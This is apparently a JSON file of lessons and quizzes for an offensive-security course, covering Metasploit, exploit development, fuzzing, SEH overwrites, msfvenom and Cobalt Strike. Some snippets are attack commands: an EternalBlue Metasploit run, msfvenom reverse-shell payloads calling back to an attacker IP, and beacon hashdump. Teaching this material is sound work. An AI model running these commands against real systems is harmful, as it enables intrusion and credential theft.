stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"metasploit-modules","cat":"Exploitation","title":"Metasploit Deep Dive","diff":1,"xp":100,"intro":"From search to shell with Metasploit.","sections":[{"type":"text","content":"Metasploit: search for exploit, set options, pick payload, run."},{"type":"code","lang":"bash","content":"msfconsole\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 10.10.10.5\nset payload windows/x64/meterpreter/reverse_tcp\nexploit"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What module type delivers payloads?","opts":["auxiliary","post","exploit","encoder"],"ans":2},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"custom-exploit-dev","cat":"Exploitation","title":"Custom Exploit Development","diff":3,"xp":300,"intro":"No public exploit. You have a crash and a debugger.","sections":[{"type":"text","content":"Find the bug, reproduce crash, analyze in debugger, develop exploit, test."},{"type":"code","lang":"bash","content":"msf-pattern_create -l 5000 > pattern.txt\n# Send, check EIP in debugger\nmsf-pattern_offset -l 5000 -q 0x41326341"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"First step in exploit dev?","opts":["Write shellcode","Reproduce the crash reliably","Contact vendor","Bypass ASLR"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"fuzzing-afl","cat":"Exploitation","title":"Fuzzing with AFL","diff":2,"xp":200,"intro":"Mutate inputs until something crashes.","sections":[{"type":"text","content":"AFL instruments the binary and mutates inputs to maximize code coverage."},{"type":"code","lang":"bash","content":"afl-gcc -o target_afl target.c\nmkdir in out\nafl-fuzz -i in -o out ./target_afl @@"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"'Coverage-guided' means?","opts":["Tests all paths","Mutates to explore new code branches","Tests main only","Requires source"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"fuzzing-boofuzz","cat":"Exploitation","title":"Protocol Fuzzing with Boofuzz","diff":2,"xp":200,"intro":"Define protocol structure, mutate each field.","sections":[{"type":"text","content":"Boofuzz defines protocol fields and systematically mutates them while monitoring for crashes."},{"type":"code","lang":"python","content":"from boofuzz import *\nsession = Session(target=Target(connection=SocketConnection('target',9999,proto='tcp')))\ns_initialize('req')\ns_string('GET', fuzzable=False)\ns_delim(' ')\ns_string('/index.html')\nsession.connect(s_get('req'))\nsession.fuzz()"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Boofuzz is designed to fuzz?","opts":["File formats","Network protocols","Web forms","Kernel syscalls"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"egg-hunting","cat":"Exploitation","title":"Egg Hunting","diff":3,"xp":250,"intro":"Buffer too small. Egg hunter searches memory for the real payload.","sections":[{"type":"text","content":"A tiny (~32 byte) egg hunter searches process memory for a unique marker before your full shellcode."},{"type":"code","lang":"nasm","content":"; Search for 'w00t' tag repeated twice\n; ~32 bytes, searches all memory pages"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why use an egg hunter?","opts":["Bypass AV","Buffer too small for full shellcode","Encrypt payload","Avoid network detection"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"seh-overwrites","cat":"Exploitation","title":"SEH Overwrite Exploits","diff":3,"xp":250,"intro":"Overwrite Windows exception handler chain.","sections":[{"type":"text","content":"Overflow into the SEH chain to hijack execution when an exception occurs."},{"type":"code","lang":"python","content":"nseh = b'xebx06x90x90'  # short jump\nseh = struct.pack('<I', 0x10012345)  # pop pop ret\npayload = b'A' * offset + nseh + seh + nops + shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"SEH chain contains?","opts":["Network sockets","Exception handler pointers","Encryption keys","Thread IDs"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"msfvenom-payloads","cat":"Exploitation","title":"Msfvenom Payload Generation","diff":1,"xp":75,"intro":"Generate shellcode and executables for any platform.","sections":[{"type":"text","content":"Msfvenom generates payloads in multiple formats: exe, elf, dll, php, python, raw shellcode."},{"type":"code","lang":"bash","content":"msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"-b flag in msfvenom?","opts":["Bind port","Bad characters to avoid","Background mode","Buffer size"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"cobalt-strike-basics","cat":"Exploitation","title":"Cobalt Strike Overview","diff":3,"xp":200,"intro":"The commercial C2 used by red teams worldwide.","sections":[{"type":"text","content":"Cobalt Strike provides Beacon (implant), Malleable C2 profiles, and post-exploitation features."},{"type":"code","lang":"bash","content":"./teamserver <IP> <password>\n# Connect client, create listener, generate beacon\nbeacon> shell whoami\nbeacon> hashdump"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Cobalt Strike's implant is called?","opts":["Agent","Beacon","Listener","Stager"],"ans":1},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely 